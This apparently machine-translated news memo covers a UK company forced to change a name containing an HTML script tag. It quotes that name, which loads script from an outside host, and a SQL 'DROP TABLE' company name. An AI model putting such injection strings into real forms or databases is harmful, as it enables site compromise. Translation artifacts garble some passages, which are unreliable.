November 4, 2024 19:00 Memo
A case in which a software development company that adopted HTML script tags in its company name was forced by the company registry to change its name because it “lead to database vulnerability” has become a hot topic on the social news site Hacker News. Masu.
Company forced to change name that could be used to hack websites | UK news | The Guardian
https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk
UK govt aims to kill off Bobby Tables in Companies House name rules
https://www.thestack.technology/companies-house-names-rules-drop-table/
Company named “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” forced to change it (2020) | Hacker News
https://news.ycombinator.com/item?id=41948666
According to news reported by the British daily newspaper The Guardian in November 2020, the company in question was a development company founded by a British software engineer. The company name was “HT > LTD” (all symbols were originally half-width characters).
However, if a website with insufficient security measures did not properly handle this company name, it could recognize the company name as blank, potentially allowing unintended script execution.
When registering a company in the UK, the Companies Registry is required to display the exact name provided, subject to existing regulations. The Companies Registry’s naming rules covered imitations and offensive language, but not attempts to falsify data input.
In the UK in 2016web comicsThere is also a company registered under the company name “;DROP TABLE “COMPANIES”;– LTD”, which is based on. Founder Sam Pizzi said, “The commands that make up this company’s name contain intentional mistakes.We do not intend to raise any major issues with the company’s name, but rather use the knowledge of security personnel to make fun of it. I was just trying to get it.” Please note that this company name has not been changed and is still in use at the time of article creation.
The founder of “> LTD” said that he chose this company name because he thought it would be a fun and playful name for his consulting business. However, a malicious attacker could use the same technique tocross-site scriptingIt is also possible to launch a more serious attack called “.
As a result, the Company Registry ordered the company to remove it from its database and change its name. The founder of “> LTD” accepted this order, and “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” )”. At the same time, the old company name was completely deleted from the database of the Company Registry.
THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD overview – Find and update company information – GOV.UK
After that, the British government announced that in 2022 “Economic Crime and Corporate Transparency Bill” and changed the naming rules of the company registry. As company names that falsify data input are also subject to regulations, similar company names cannot be registered.
Hacker News says “What about company names that influence AI prompts?」「All in all, it makes sense to restrict such names. This solution is more practical unless you are willing to pay to audit all data users worldwide. I’m not sure what you gain by having a code in your company name” At the same time, discussions such as “There are also examples of SQL injection being embedded in speed cameras by pasting script code onto license plates.」「My daughter was born in Hawaii, and her name can be up to 240 characters long on her Hawaiian birth certificate, so I chose her middle name as Periodic Table.」「I myself have set my auction site username in script code in the past to prevent anyone else from bidding on the auctions I bid on. I won a lot of auctions, but then my account was deleted.Similar cases were also introduced.
Copy the title and URL of this article